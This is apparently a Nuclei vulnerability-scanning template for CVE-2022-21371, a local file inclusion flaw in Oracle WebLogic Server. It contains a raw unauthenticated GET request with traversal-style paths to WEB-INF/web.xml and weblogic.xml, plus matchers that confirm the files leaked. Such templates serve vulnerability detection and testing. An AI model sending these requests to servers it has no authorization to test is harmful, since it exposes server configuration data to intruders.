id: CVE-2022-21371

info:
  name: Oracle WebLogic Server Local File Inclusion
  author: paradessia,narluin
  severity: high
  description: An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data.
  reference:
    - https://www.oracle.com/security-alerts/cpujan2022.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-21371
    - https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786
    - http://packetstormsecurity.com/files/165736/Oracle-WebLogic-Server-14.1.1.0.0-Local-File-Inclusion.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-21371
    cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:*
    epss-score: 0.9693
  metadata:
    max-request: 2
  tags: cve,cve2022,lfi,weblogic,oracle,packetstorm

http:
  - method: GET
    raw:
      - |+
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      path:
        - .//WEB-INF/weblogic.xml
        - .//WEB-INF/web.xml

    unsafe: true
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "<web-app") && contains(body, "</web-app>")'
          - 'contains(body, "<weblogic-web-app") && contains(body, "</weblogic-web-app>")'
        condition: or

      - type: dsl
        dsl:
          - 'contains(all_headers, "text/xml")'
          - 'contains(all_headers, "application/xml")'
        condition: or

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/03/08